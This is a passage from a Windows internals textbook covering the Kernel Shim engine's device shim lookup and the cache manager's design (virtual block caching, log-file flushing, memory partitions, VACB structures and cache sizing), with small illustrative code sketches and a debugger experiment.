through the NtQuerySystemInformation API used with the SystemDeviceDataInformation information
class. Device shims are always stored in three different locations, consulted in the following order:
1. In the HKLM\System\CurrentControlSet\Control\Compatibility\Device root registry key, using a key named after the PNP hardware ID of the device, with the \ character replaced by a ! (so that it is not interpreted as a registry path separator). Values in the device key specify the device's shimmed data being queried (usually flags for a certain device class).
2. In the kernel shim cache. The Kernel Shim engine implements a shim cache (exposed through the KSE_CACHE data structure) with the goal of speeding up searches for device flags and data.
3. In the Shim database file, using the KDEVICE root tag. The root tag, among many others (like device description, manufacturer name, GUID, and so on), includes the child NAME tag containing a string composed as follows: <DataName:HardwareID>. The KFLAG or KDATA children tags include the value for the device's shimmed data.
If the device shim is present only in the SDB file and not in the cache, it is always added to the cache, so that future queries are faster and do not require any access to the Shim database file.
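The key-name transformation used by the first lookup location is simple enough to sketch. The helper name and the sample hardware ID below are illustrative, not taken from any real driver:

```python
def device_key_name(hardware_id: str) -> str:
    """Build the registry key name for a device shim: the PNP hardware ID
    with '\\' replaced by '!', since '\\' separates registry path components."""
    return hardware_id.replace("\\", "!")
```

A hypothetical hardware ID such as PCI\VEN_8086&DEV_100E would therefore be looked up under the key PCI!VEN_8086&DEV_100E.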
Conclusion
In this chapter, we have described the most important features of the Windows operating system
that provide management facilities, like the Windows Registry, user-mode services, task scheduling,
UBPM, and Windows Management Instrumentation (WMI). Furthermore, we have discussed how Event
Tracing for Windows (ETW), DTrace, Windows Error Reporting (WER), and Global Flags (GFlags) provide
the services that allow users to better trace and diagnose issues arising from any component of the
OS or user-mode applications. The chapter concluded with a peek at the Kernel Shim engine, which
helps the system apply compatibility strategies and correctly execute old components that have been
designed for older versions of the operating system.
The next chapter delves into the different file systems available in Windows and into the global caching facilities available for speeding up file and data access.
CHAPTER 11
Caching and file systems
The cache manager is a set of kernel-mode functions and system threads that cooperate with the
memory manager to provide data caching for all Windows file system drivers (both local and
network). In this chapter, we explain how the cache manager, including its key internal data structures
and functions, works; how it is sized at system initialization time; how it interacts with other elements
of the operating system; and how you can observe its activity through performance counters. We also
describe the five flags on the Windows CreateFile function that affect file caching and DAX volumes,
which are memory-mapped disks that bypass the cache manager for certain types of I/O.
The services exposed by the cache manager are used by all the Windows File System drivers, which
cooperate strictly with the former to be able to manage disk I/O as fast as possible. We describe the dif-
ferent file systems supported by Windows, in particular with a deep analysis of NTFS and ReFS (the two
most used file systems). We present their internal architecture and basic operations, including how they
interact with other system components, such as the memory manager and the cache manager.
The chapter concludes with an overview of Storage Spaces, the new storage solution designed to
replace dynamic disks. Spaces can create tiered and thinly provisioned virtual disks, providing features
that can be leveraged by the file system that resides at the top.
Terminology
To fully understand this chapter, you need to be familiar with some basic terminology:
- Disks are physical storage devices such as a hard disk, CD-ROM, DVD, Blu-ray, solid-state disk (SSD), Non-volatile Memory disk (NVMe), or flash drive.
- Sectors are hardware-addressable blocks on a storage medium. Sector sizes are determined by hardware. Most hard disk sectors are 4,096 or 512 bytes; DVD-ROM and Blu-ray sectors are typically 2,048 bytes. Thus, if the sector size is 4,096 bytes and the operating system wants to modify the 5120th byte on a disk, it must write a 4,096-byte block of data to the second sector on the disk.
- Partitions are collections of contiguous sectors on a disk. A partition table or other disk-management database stores a partition's starting sector, size, and other characteristics and is located on the same disk as the partition.
- Volumes are objects that represent sectors that file system drivers always manage as a single unit. Simple volumes represent sectors from a single partition, whereas multipartition volumes represent sectors from multiple partitions. Multipartition volumes offer performance, reliability, and sizing features that simple volumes do not.
- File system formats define the way that file data is stored on storage media, and they affect a file system's features. For example, a format that doesn't allow user permissions to be associated with files and directories can't support security. A file system format can also impose limits on the sizes of files and storage devices that the file system supports. Finally, some file system formats efficiently implement support for either large or small files or for large or small disks. NTFS, exFAT, and ReFS are examples of file system formats that offer different sets of features and usage scenarios.
- Clusters are the addressable blocks that many file system formats use. Cluster size is always a multiple of the sector size, as shown in Figure 11-1, in which eight sectors make up each cluster. File system formats use clusters to manage disk space more efficiently; a cluster size that is larger than the sector size divides a disk into more manageable blocks. The potential trade-off of a larger cluster size is wasted disk space, or internal fragmentation, that results when file sizes aren't exact multiples of the cluster size.
FIGURE 11-1 Sectors and clusters on a classical spinning disk.
- Metadata is data stored on a volume in support of file system format management. It isn't typically made accessible to applications. Metadata includes the data that defines the placement of files and directories on a volume, for example.
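The sector and cluster arithmetic above can be made concrete with a short sketch; the 4,096-byte sector size is taken from the example in the text, and the function names are illustrative:

```python
SECTOR_SIZE = 4096

def sector_for_offset(byte_offset: int) -> int:
    """Which sector holds a given byte: modifying byte 5120 means
    rewriting the whole second sector (index 1)."""
    return byte_offset // SECTOR_SIZE

def internal_fragmentation(file_size: int, cluster_size: int) -> int:
    """Wasted bytes at the tail of the last cluster when the file size
    is not an exact multiple of the cluster size."""
    return -file_size % cluster_size
```

A 5,000-byte file on a volume with 4,096-byte clusters occupies two clusters and wastes 3,192 bytes; a file whose size is an exact multiple of the cluster size wastes none.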
Key features of the cache manager
The cache manager has several key features:
- Supports all file system types (both local and network), thus removing the need for each file system to implement its own cache management code.
- Uses the memory manager to control which parts of which files are in physical memory (trading off demands for physical memory between user processes and the operating system).
- Caches data on a virtual block basis (offsets within a file)—in contrast to many caching systems, which cache on a logical block basis (offsets within a disk volume)—allowing for intelligent read-ahead and high-speed access to the cache without involving file system drivers. (This method of caching, called fast I/O, is described later in this chapter.)
- Supports "hints" passed by applications at file open time (such as random versus sequential access, temporary file creation, and so on).
- Supports recoverable file systems (for example, those that use transaction logging) to recover data after a system failure.
- Supports solid state, NVMe, and direct access (DAX) disks.
Although we talk more throughout this chapter about how these features are used in the cache
manager, in this section we introduce you to the concepts behind these features.
Single, centralized system cache
Some operating systems rely on each individual file system to cache data, a practice that results either in
duplicated caching and memory management code in the operating system or in limitations on the kinds
of data that can be cached. In contrast, Windows offers a centralized caching facility that caches all exter-
nally stored data, whether on local hard disks, USB removable drives, network file servers, or DVD-ROMs.
Any data can be cached, whether it’s user data streams (the contents of a file and the ongoing read and
write activity to that file) or file system metadata (such as directory and file headers). As we discuss in this
chapter, the method Windows uses to access the cache depends on the type of data being cached.
The memory manager
One unusual aspect of the cache manager is that it never knows how much cached data is actually in
physical memory. This statement might sound strange because the purpose of a cache is to keep a sub-
set of frequently accessed data in physical memory as a way to improve I/O performance. The reason
the cache manager doesn’t know how much data is in physical memory is that it accesses data by map-
ping views of files into system virtual address spaces, using standard section objects (or file mapping ob-
jects in Windows API terminology). (Section objects are a basic primitive of the memory manager and
are explained in detail in Chapter 5, “Memory Management” of Part 1). As addresses in these mapped
views are accessed, the memory manager pages in blocks that aren't in physical memory. And when
memory demands dictate, the memory manager unmaps these pages out of the cache and, if the data
has changed, pages the data back to the files.
By caching on the basis of a virtual address space using mapped files, the cache manager avoids gen-
erating read or write I/O request packets (IRPs) to access the data for files it’s caching. Instead, it simply
copies data to or from the virtual addresses where the portion of the cached file is mapped and relies on
the memory manager to fault the data into (or out of) memory as needed. This process allows
the memory manager to make global trade-offs on how much RAM to give to the system cache versus
how much to give to user processes. (The cache manager also initiates I/O, such as lazy writing, which we
describe later in this chapter; however, it calls the memory manager to write the pages.) Also, as we dis-
cuss in the next section, this design makes it possible for processes that open cached files to see the same
data as do other processes that are mapping the same files into their user address spaces.
Cache coherency
One important function of a cache manager is to ensure that any process that accesses cached data will
get the most recent version of that data. A problem can arise when one process opens a file (and hence
the file is cached) while another process maps the file into its address space directly (using the Windows
MapViewOfFile function). This potential problem doesn’t occur under Windows because both the cache
manager and the user applications that map files into their address spaces use the same memory man-
agement file mapping services. Because the memory manager guarantees that it has only one represen-
tation of each unique mapped file (regardless of the number of section objects or mapped views), it maps
all views of a file (even if they overlap) to a single set of pages in physical memory, as shown in Figure 11-2.
(For more information on how the memory manager works with mapped files, see Chapter 5 of Part 1.)
FIGURE 11-2 Coherent caching scheme.
So, for example, if Process 1 has a view (View 1) of the file mapped into its user address space, and
Process 2 is accessing the same view via the system cache, Process 2 sees any changes that Process
1 makes as they’re made, not as they’re flushed. The memory manager won’t flush all user-mapped
pages—only those that it knows have been written to (because they have the modified bit set).
Therefore, any process accessing a file under Windows always sees the most up-to-date version of that
file, even if some processes have the file open through the I/O system and others have the file mapped
into their address space using the Windows file mapping functions.
Note Cache coherency in this case refers to coherency between user-mapped data and
cached I/O and not between noncached and cached hardware access and I/Os, which are
almost guaranteed to be incoherent. Also, cache coherency is somewhat more difficult for
network redirectors than for local file systems because network redirectors must imple-
ment additional flushing and purge operations to ensure cache coherency when accessing
network data.
Virtual block caching
The Windows cache manager uses a method known as virtual block caching, in which the cache manager
keeps track of which parts of which files are in the cache. The cache manager is able to monitor these
file portions by mapping 256 KB views of files into system virtual address spaces, using special system
cache routines located in the memory manager. This approach has the following key benefits:
- It opens up the possibility of doing intelligent read-ahead; because the cache tracks which parts of which files are in the cache, it can predict where the caller might be going next.
- It allows the I/O system to bypass going to the file system for requests for data that is already in the cache (fast I/O). Because the cache manager knows which parts of which files are in the cache, it can return the address of cached data to satisfy an I/O request without having to call the file system.
Details of how intelligent read-ahead and fast I/O work are provided later in this chapter in the
“Fast I/O” and “Read-ahead and write-behind” sections.
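Locating a cached byte under this scheme reduces to simple view arithmetic; the sketch below uses the 256 KB view size mentioned above, with illustrative names:

```python
VIEW_SIZE = 256 * 1024  # the cache manager maps files in 256 KB views

def locate_in_cache(file_offset: int):
    """Return (view index, offset within the view) for a cached file byte:
    the view that covers the offset, plus the position inside that view."""
    return file_offset // VIEW_SIZE, file_offset % VIEW_SIZE
```

A byte at file offset 256 KB + 10 therefore lives 10 bytes into the second mapped view.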
Stream-based caching
The cache manager is also designed to do stream caching rather than file caching. A stream is a
sequence of bytes within a file. Some file systems, such as NTFS, allow a file to contain more than one
stream; the cache manager accommodates such file systems by caching each stream independently.
NTFS can exploit this feature by organizing its master file table (described later in this chapter in the
“Master file table” section) into streams and by caching these streams as well. In fact, although the
cache manager might be said to cache files, it actually caches streams (all files have at least one stream
of data) identified by both a file name and, if more than one stream exists in the file, a stream name.
Note Internally, the cache manager is not aware of file or stream names but uses pointers to
these structures.
Recoverable file system support
Recoverable file systems such as NTFS are designed to reconstruct the disk volume structure after a
system failure. This capability means that I/O operations in progress at the time of a system failure must
be either entirely completed or entirely backed out from the disk when the system is restarted. Half-
completed I/O operations can corrupt a disk volume and even render an entire volume inaccessible.
To avoid this problem, a recoverable file system maintains a log file in which it records every update
it intends to make to the file system structure (the file system’s metadata) before it writes the change
to the volume. If the system fails, interrupting volume modifications in progress, the recoverable file
system uses information stored in the log to reissue the volume updates.
To guarantee a successful volume recovery, every log file record documenting a volume update must
be completely written to disk before the update itself is applied to the volume. Because disk writes are
cached, the cache manager and the file system must coordinate metadata updates by ensuring that the
log file is flushed ahead of metadata updates. Overall, the following actions occur in sequence:
1. The file system writes a log file record documenting the metadata update it intends to make.
2. The file system calls the cache manager to flush the log file record to disk.
3. The file system writes the volume update to the cache—that is, it modifies its cached metadata.
4. The cache manager flushes the altered metadata to disk, updating the volume structure. (Actually, log file records are batched before being flushed to disk, as are volume modifications.)
Note The term metadata applies only to changes in the file system structure: file and direc-
tory creation, renaming, and deletion.
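The four-step ordering above can be modeled as a tiny write-ahead-logging sketch. Everything here is invented for illustration (toy_fs and its helpers are not real NTFS or cache manager interfaces); it only demonstrates the invariant that a metadata update may reach the volume only after the log record describing it is durable.

```c
#include <assert.h>

/* Toy write-ahead-logging model of the four steps above. */
enum { LOG_SLOTS = 8 };

struct toy_fs {
    int log_flushed[LOG_SLOTS];    /* 1 = log record durable on disk   */
    int meta_on_volume[LOG_SLOTS]; /* 1 = metadata update hit the disk */
    int next_lsn;
};

int write_log_record(struct toy_fs *fs) {         /* step 1: record intent */
    return fs->next_lsn++;
}
void flush_log(struct toy_fs *fs, int lsn) {      /* step 2: make log durable */
    fs->log_flushed[lsn] = 1;
}
void flush_metadata(struct toy_fs *fs, int lsn) { /* step 4: write volume update */
    assert(fs->log_flushed[lsn]);                 /* write-ahead invariant */
    fs->meta_on_volume[lsn] = 1;
}

/* One metadata update, performed in the required order. */
int metadata_update(struct toy_fs *fs) {
    int lsn = write_log_record(fs);
    flush_log(fs, lsn);
    /* step 3: modify cached metadata (elided in this toy model) */
    flush_metadata(fs, lsn);
    return lsn;
}
```

If the order of steps 2 and 4 were reversed, the assertion inside flush_metadata would fire, which is exactly the corruption window a recoverable file system is designed to close.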
When a file system writes data to the cache, it can supply a logical sequence number (LSN) that
identifies the record in its log file, which corresponds to the cache update. The cache manager keeps
track of these numbers, recording the lowest and highest LSNs (representing the oldest and newest
log file records) associated with each page in the cache. In addition, data streams that are protected by
transaction log records are marked as “no write” by NTFS so that the mapped page writer won’t inad-
vertently write out these pages before the corresponding log records are written. (When the mapped
page writer sees a page marked this way, it moves the page to a special list that the cache manager
then flushes at the appropriate time, such as when lazy writer activity takes place.)
When it prepares to flush a group of dirty pages to disk, the cache manager determines the highest
LSN associated with the pages to be flushed and reports that number to the file system. The file system
can then call the cache manager back, directing it to flush log file data up to the point represented by
the reported LSN. After the cache manager flushes the log file up to that LSN, it flushes the correspond-
ing volume structure updates to disk, thus ensuring that it records what it’s going to do before actually
doing it. These interactions between the file system and the cache manager guarantee the recoverabil-
ity of the disk volume after a system failure.
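A minimal sketch of the LSN coordination just described, using hypothetical names (dirty_page, lsn_to_flush): the cache manager determines the highest LSN among the dirty pages, and flushing those pages is legal only once the file system has flushed its log at least that far.

```c
#include <assert.h>

/* Each dirty cached page remembers the newest log record (LSN)
 * protecting it; this is a model, not the real data structures. */
struct dirty_page { int highest_lsn; };

/* The LSN the cache manager reports to the file system before flushing. */
int lsn_to_flush(const struct dirty_page *pages, int n) {
    int max = 0;
    for (int i = 0; i < n; i++)
        if (pages[i].highest_lsn > max)
            max = pages[i].highest_lsn;
    return max;
}

/* Flushing the pages is legal only once the log is durable that far. */
int may_flush_pages(const struct dirty_page *pages, int n, int log_flushed_to) {
    return log_flushed_to >= lsn_to_flush(pages, n);
}
```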
NTFS MFT working set enhancements
As we have described in the previous paragraphs, the mechanism that the cache manager uses to
cache files is the same as general memory mapped I/O interfaces provided by the memory manager
to the operating system. For accessing or caching a file, the cache manager maps a view of the file in
the system virtual address space. The contents are then accessed simply by reading off the mapped
virtual address range. When the cached content of a file is no longer needed (for various reasons—see
the next paragraphs for details), the cache manager unmaps the view of the file. This strategy works
well for any kind of data files but has some problems with the metadata that the file system maintains
for correctly storing the files in the volume.
When a file handle is closed (or the owning process dies), the cache manager ensures that the cached
data is no longer in the working set. The NTFS file system accesses the Master File Table (MFT) as a big file,
which is cached like any other user files by the cache manager. The problem with the MFT is that, since
it is a system file, which is mapped and processed in the System process context, nobody will ever close
its handle (unless the volume is unmounted), so the system never unmaps any cached view of the MFT.
The process that initially caused a particular view of MFT to be mapped might have closed the handle or
exited, leaving potentially unwanted views of MFT still mapped into memory consuming valuable system
cache (these views will be unmapped only if the system runs into memory pressure).
Windows 8.1 resolved this problem by storing a reference counter to every MFT record in a dynami-
cally allocated multilevel array, which is stored in the NTFS file system Volume Control Block (VCB)
structure. Every time a File Control Block (FCB) data structure is created (further details on the FCB
and VCB are available later in this chapter), the file system increases the counter of the relative MFT
index record. In the same way, when the FCB is destroyed (meaning that all the handles to the file or
directory that the MFT entry refers to are closed), NTFS dereferences the relative counter and calls the
CcUnmapFileOffsetFromSystemCache cache manager routine, which will unmap the part of the MFT
that is no longer needed.
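The reference-counting scheme can be sketched as follows. The names are invented (fcb_create, fcb_destroy), and unmap_calls simply stands in for invocations of CcUnmapFileOffsetFromSystemCache when a record's counter drops to zero.

```c
#include <assert.h>

/* Toy per-MFT-record reference counters, as in the Windows 8.1 scheme. */
enum { MFT_RECORDS = 16 };

int mft_refs[MFT_RECORDS];
int unmap_calls; /* stands in for CcUnmapFileOffsetFromSystemCache calls */

void fcb_create(int mft_index) {  /* FCB created: take a reference */
    mft_refs[mft_index]++;
}
void fcb_destroy(int mft_index) { /* all handles closed: drop it */
    assert(mft_refs[mft_index] > 0);
    if (--mft_refs[mft_index] == 0)
        unmap_calls++;            /* unmap that part of the cached MFT */
}
int pending_unmaps(void) { return unmap_calls; }
```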
Memory partitions support
Windows 10, with the goal of providing support for Hyper-V containers and game mode,
introduced the concept of partitions. Memory partitions have already been described in Chapter
5 of Part 1. As seen in that chapter, memory partitions are represented by a large data structure
(MI_PARTITION), which maintains memory-related management structures related to the partition,
such as page lists (standby, modified, zero, free, and so on), commit charge, working set, page trim-
mer, modified page writer, and zero-page thread. The cache manager needs to cooperate with the
memory manager in order to support partitions. During phase 1 of NT kernel initialization, the system
creates and initializes the cache manager partition (for further details about Windows kernel initial-
ization, see Chapter 12, “Startup and shutdown”), which will be part of the System Executive parti-
tion (MemoryPartition0). The cache manager’s code has gone through a big refactoring to support
partitions; all the global cache manager data structures and variables have been moved in the cache
manager partition data structure (CC_PARTITION).
The cache manager’s partition contains cache-related data, like the global shared cache maps list,
the worker threads list (read-ahead, write-behind, and extra write-behind; lazy writer and lazy writer
scan; async reads), lazy writer scan events, an array that holds the history of write-behind throughput,
the upper and lower limit for the dirty pages threshold, the number of dirty pages, and so on. When
the cache manager system partition is initialized, all the needed system threads are started in the
context of a System process which belongs to the partition. Each partition always has an associated
minimal System process, which is created at partition-creation time (by the NtCreatePartition API).
When the system creates a new partition through the NtCreatePartition API, it always creates and
initializes an empty MI_PARTITION object (the memory is moved from a parent partition to the child,
or hot-added later by using the NtManagePartition function). A cache manager partition object is
created only on-demand. If no files are created in the context of the new partition, there is no need to
create the cache manager partition object. When the file system creates or opens a file for caching access, the CcInitializeCacheMap(Ex) function checks which partition the file belongs to and whether the
partition has a valid link to a cache manager partition. In case there is no cache manager partition, the
system creates and initializes a new one through the CcCreatePartition routine. The new partition starts
separate cache manager-related threads (read-ahead, lazy writers, and so on) and calculates the new
values of the dirty page threshold based on the number of pages that belong to the specific partition.
The file object contains a link to the partition it belongs to through its control area, which is initially
allocated by the file system driver when creating and mapping the Stream Control Block (SCB). The
partition of the target file is stored into a file object extension (of type MemoryPartitionInformation)
and is checked by the memory manager when creating the section object for the SCB. In general, files
are shared entities, so there is no way for File System drivers to automatically associate a file to a differ-
ent partition than the System Partition. An application can set a different partition for a file using the
NtSetInformationFileKernel API, through the new FileMemoryPartitionInformation class.
Cache virtual memory management
Because the Windows system cache manager caches data on a virtual basis, it uses up regions of sys-
tem virtual address space (instead of physical memory) and manages them in structures called virtual
address control blocks, or VACBs. VACBs define these regions of address space into 256 KB slots called
views. When the cache manager initializes during the bootup process, it allocates an initial array of
VACBs to describe cached memory. As caching requirements grow and more memory is required, the
cache manager allocates more VACB arrays, as needed. It can also shrink virtual address space as other
demands put pressure on the system.
At a file’s first I/O (read or write) operation, the cache manager maps a 256 KB view of the 256 KB-
aligned region of the file that contains the requested data into a free slot in the system cache address
space. For example, if 10 bytes starting at an offset of 300,000 bytes were read from a file, the view that
would be mapped would begin at offset 262,144 (the second 256 KB-aligned region of the file) and
extend for 256 KB.
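The arithmetic of that example can be expressed directly. This is just the 256 KB view geometry, not any real cache manager routine:

```c
#include <assert.h>
#include <stdint.h>

/* A read of 10 bytes at file offset 300,000 lands in the second
 * 256 KB-aligned region, so the mapped view begins at byte 262,144. */
#define VIEW_SIZE (256u * 1024u) /* 262,144 bytes */

uint64_t view_index(uint64_t file_offset) { return file_offset / VIEW_SIZE; }
uint64_t view_base(uint64_t file_offset)  { return view_index(file_offset) * VIEW_SIZE; }

/* 1 if the request [offset, offset+len) fits inside a single view. */
int fits_in_one_view(uint64_t offset, uint64_t len) {
    return len > 0 && view_index(offset) == view_index(offset + len - 1);
}
```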
The cache manager maps views of files into slots in the cache’s address space on a round-robin
basis, mapping the first requested view into the first 256 KB slot, the second view into the second 256
KB slot, and so forth, as shown in Figure 11-3. In this example, File B was mapped first, File A second,
and File C third, so File B’s mapped chunk occupies the first slot in the cache. Notice that only the first
256 KB portion of File B has been mapped, which is due to the fact that only part of the file has been
accessed. Because File C is only 100 KB (and thus smaller than one of the views in the system cache), it
requires its own 256 KB slot in the cache.
FIGURE 11-3 Files of varying sizes mapped into the system cache. (The figure shows sections of File A (500 KB), File B (750 KB), and File C (100 KB) mapped into numbered 256 KB view slots of the system cache.)
The cache manager guarantees that a view is mapped as long as it’s active (although views can
remain mapped after they become inactive). A view is marked active, however, only during a read
or write operation to or from the file. Unless a process opens a file by specifying the FILE_FLAG_
RANDOM_ ACCESS flag in the call to CreateFile, the cache manager unmaps inactive views of a file as it
maps new views for the file if it detects that the file is being accessed sequentially. Pages for unmapped
views are sent to the standby or modified lists (depending on whether they have been changed), and
because the memory manager exports a special interface for the cache manager, the cache manager
can direct the pages to be placed at the end or front of these lists. Pages that correspond to views of
files opened with the FILE_FLAG_SEQUENTIAL_SCAN flag are moved to the front of the lists, whereas
all others are moved to the end. This scheme encourages the reuse of pages belonging to sequentially
read files and specifically prevents a large file copy operation from affecting more than a small part of
physical memory. The flag also affects unmapping. The cache manager will aggressively unmap views
when this flag is supplied.
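One way to picture the placement policy is a toy standby list in which pages from sequentially scanned files are inserted at the front (first candidates for reuse) and all others at the back. This is a model of the behavior described above, not the memory manager's actual list implementation.

```c
#include <assert.h>

/* Toy standby list: an array-backed deque standing in for the
 * memory manager's standby list. */
enum { MAX_PAGES = 64 };
struct standby { int page[MAX_PAGES]; int n; };

void place_page(struct standby *s, int page, int sequential_scan) {
    assert(s->n < MAX_PAGES);
    if (sequential_scan) {
        /* Front of the list: reused first, so a large sequential copy
         * recycles its own pages instead of evicting everyone else's. */
        for (int i = s->n; i > 0; i--)
            s->page[i] = s->page[i - 1];
        s->page[0] = page;
    } else {
        s->page[s->n] = page;  /* back of the list: survives longer */
    }
    s->n++;
}

int next_page_to_reuse(const struct standby *s) { return s->page[0]; }
```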
If the cache manager needs to map a view of a file, and there are no more free slots in the cache, it will
unmap the least recently mapped inactive view and use that slot. If no views are available, an I/O error is
returned, indicating that insufficient system resources are available to perform the operation. Given that
views are marked active only during a read or write operation, however, this scenario is extremely unlikely
because thousands of files would have to be accessed simultaneously for this situation to occur.
Cache size
In the following sections, we explain how Windows computes the size of the system cache, both virtu-
ally and physically. As with most calculations related to memory management, the size of the system
cache depends on a number of factors.
Cache virtual size
On a 32-bit Windows system, the virtual size of the system cache is limited solely by the amount of
kernel-mode virtual address space and the SystemCacheLimit registry key that can be optionally con-
figured. (See Chapter 5 of Part 1 for more information on limiting the size of the kernel virtual address
space.) This means that the cache size is capped by the 2-GB system address space, but it is typically
significantly smaller because the system address space is shared with other resources, including system
page table entries (PTEs), nonpaged and paged pool, and page tables. The maximum virtual cache
size is 64 TB on 64-bit Windows, and even in this case, the limit is still tied to the system address space
size: in future systems that will support the 56-bit addressing mode, the limit will be 32 PB (petabytes).
Cache working set size
As mentioned earlier, one of the key differences in the design of the cache manager in Windows from
that of other operating systems is the delegation of physical memory management to the global
memory manager. Because of this, the existing code that handles working set expansion and trimming,
as well as managing the modified and standby lists, is also used to control the size of the system cache,
dynamically balancing demands for physical memory between processes and the operating system.
The system cache doesn’t have its own working set but shares a single system set that includes
cache data, paged pool, pageable kernel code, and pageable driver code. As explained in the section
“System working sets” in Chapter 5 of Part 1, this single working set is called internally the system cache
working set even though the system cache is just one of the components that contribute to it. For the
purposes of this book, we refer to this working set simply as the system working set. Also explained in
Chapter 5 is the fact that if the LargeSystemCache registry value is 1, the memory manager favors the
system working set over that of processes running on the system.
Cache physical size
While the system working set includes the amount of physical memory that is mapped into views in the
cache’s virtual address space, it does not necessarily reflect the total amount of file data that is cached
in physical memory. There can be a discrepancy between the two values because additional file data
might be in the memory manager’s standby or modified page lists.
Recall from Chapter 5 that during the course of working set trimming or page replacement, the
memory manager can move dirty pages from a working set to either the standby list or the modified
page list, depending on whether the page contains data that needs to be written to the paging file or
another file before the page can be reused. If the memory manager didn’t implement these lists, any
time a process accessed data previously removed from its working set, the memory manager would
have to hard-fault it in from disk. Instead, if the accessed data is present on either of these lists, the
memory manager simply soft-faults the page back into the process’s working set. Thus, the lists serve
as in-memory caches of data that are stored in the paging file, executable images, or data files. Thus,
the total amount of file data cached on a system includes not only the system working set but the com-
bined sizes of the standby and modified page lists as well.
An example illustrates how the cache manager can cause much more file data than that containable
in the system working set to be cached in physical memory. Consider a system that acts as a dedicated
file server. A client application accesses file data from across the network, while a server, such as the
file server driver (%SystemRoot%\System32\Drivers\Srv2.sys, described later in this chapter), uses
cache manager interfaces to read and write file data on behalf of the client. If the client reads through
several thousand files of 1 MB each, the cache manager will have to start reusing views when it runs out
of mapping space (and can’t enlarge the VACB mapping area). For each file read thereafter, the cache
manager unmaps views and remaps them for new files. When the cache manager unmaps a view, the
memory manager doesn’t discard the file data in the cache’s working set that corresponds to the view;
it moves the data to the standby list. In the absence of any other demand for physical memory, the
standby list can consume almost all the physical memory that remains outside the system working set.
In other words, virtually all the server’s physical memory will be used to cache file data, as shown in
Figure 11-4.
FIGURE 11-4 Example in which most of physical memory is being used by the file cache. (Of 8 GB of physical memory, the figure shows roughly 7 GB on the standby list, 960 MB in the system working set assigned to the virtual cache, and the remainder in other use.)
Because the total amount of file data cached includes the system working set, modified page list,
and standby list—the sizes of which are all controlled by the memory manager—it is in a sense the real
cache manager. The cache manager subsystem simply provides convenient interfaces for accessing
file data through the memory manager. It also plays an important role with its read-ahead and write-
behind policies in influencing what data the memory manager keeps present in physical memory, as
well as with managing views of files in the system virtual address space.
To try to accurately reflect the total amount of file data that’s cached on a system, Task Manager
shows a value named “Cached” in its performance view that reflects the combined size of the sys-
tem working set, standby list, and modified page list. Process Explorer, on the other hand, breaks up
these values into Cache WS (system cache working set), Standby, and Modified. Figure 11-5 shows the
system information view in Process Explorer and the Cache WS value in the Physical Memory area in
the lower left of the figure, as well as the size of the standby and modified lists in the Paging Lists area
near the middle of the figure. Note that the Cache value in Task Manager also includes the Paged WS,
Kernel WS, and Driver WS values shown in Process Explorer. When these values were chosen, the vast
majority of System WS came from the Cache WS. This is no longer the case today, but the anachronism
remains in Task Manager.
FIGURE 11-5 Process Explorer’s System Information dialog box.
Cache data structures
The cache manager uses the following data structures to keep track of cached files:
■ Each 256 KB slot in the system cache is described by a VACB.
■ Each separately opened cached file has a private cache map, which contains information used to control read-ahead (discussed later in the chapter in the “Intelligent read-ahead” section).
■ Each cached file has a single shared cache map structure, which points to slots in the system cache that contain mapped views of the file.
These structures and their relationships are described in the next sections.
Systemwide cache data structures
As previously described, the cache manager keeps track of the state of the views in the system cache
by using an array of data structures called virtual address control block (VACB) arrays that are stored in
nonpaged pool. On a 32-bit system, each VACB is 32 bytes in size and a VACB array is 128 KB, resulting
in 4,096 VACBs per array. On a 64-bit system, a VACB is 40 bytes, resulting in 3,276 VACBs per array. The
cache manager allocates the initial VACB array during system initialization and links it into the sys-
temwide list of VACB arrays called CcVacbArrays. Each VACB represents one 256 KB view in the system
cache, as shown in Figure 11-6. The structure of a VACB is shown in Figure 11-7.
FIGURE 11-6 System VACB array. (The figure shows the system VACB array list referencing VACB array 0 and VACB array 1; each VACB entry in an array describes one 256 KB view in the system cache.)
FIGURE 11-7 VACB data structure. (Its fields, in order: virtual address of data in system cache; pointer to shared cache map; file offset and active count; link entry to LRU list head; pointer to owning VACB array.)
Additionally, each VACB array is composed of two kinds of VACB: low priority mapping VACBs and high
priority mapping VACBs. The system allocates 64 initial high priority VACBs for each VACB array. High
priority VACBs have the distinction of having their views preallocated from system address space. When
the memory manager has no views to give to the cache manager at the time of mapping some data, and
if the mapping request is marked as high priority, the cache manager will use one of the preallocated
views present in a high priority VACB. It uses these high priority VACBs, for example, for critical file system
metadata as well as for purging data from the cache. After high priority VACBs are gone, however, any
operation requiring a VACB view will fail with insufficient resources. Typically, the mapping priority is set
to the default of low, but by using the PIN_HIGH_PRIORITY flag when pinning (described later) cached
data, file systems can request a high priority VACB to be used instead, if one is needed.
As you can see in Figure 11-7, the first field in a VACB is the virtual address of the data in the system
cache. The second field is a pointer to the shared cache map structure, which identifies which file is
cached. The third field identifies the offset within the file at which the view begins (always based on
256 KB granularity). Given this granularity, the bottom 16 bits of the file offset will always be zero, so
those bits are reused to store the number of references to the view—that is, how many active reads
or writes are accessing the view. The fourth field links the VACB into a list of least-recently-used (LRU)
VACBs when the cache manager frees the VACB; the cache manager first checks this list when allocat-
ing a new VACB. Finally, the fifth field links this VACB to the VACB array header representing the array
in which the VACB is stored.
During an I/O operation on a file, the file’s VACB reference count is incremented, and then it’s
decremented when the I/O operation is over. When the reference count is nonzero, the VACB is active.
For access to file system metadata, the active count represents how many file system drivers have the
pages in that view locked into memory.
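The offset/reference-count overlay can be illustrated with a hypothetical pack/unpack pair. The real VACB achieves this with an overlaid union rather than explicit helpers; the point is only that 256 KB alignment guarantees the low 16 bits of the offset are free to hold the active count.

```c
#include <assert.h>
#include <stdint.h>

/* Because view offsets are 256 KB-aligned, their low 16 bits are always
 * zero, so a 16-bit active count can share the same 64-bit word. */
#define COUNT_MASK 0xFFFFu

uint64_t pack(uint64_t file_offset, uint16_t active_count) {
    assert((file_offset & COUNT_MASK) == 0); /* must be 256 KB-aligned */
    return file_offset | active_count;
}
uint64_t offset_of(uint64_t packed) { return packed & ~(uint64_t)COUNT_MASK; }
uint16_t count_of(uint64_t packed)  { return (uint16_t)(packed & COUNT_MASK); }
```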
EXPERIMENT: Looking at VACBs and VACB statistics
The cache manager internally keeps track of various values that are useful to developers and
support engineers when debugging crash dumps. All these debugging variables start with the
CcDbg prefix, which makes it easy to see the whole list, thanks to the x command:
1: kd> x nt!*ccdbg*
fffff800`d052741c nt!CcDbgNumberOfFailedWorkQueueEntryAllocations = <no type information>
fffff800`d05276ec nt!CcDbgNumberOfNoopedReadAheads = <no type information>
fffff800`d05276e8 nt!CcDbgLsnLargerThanHint = <no type information>
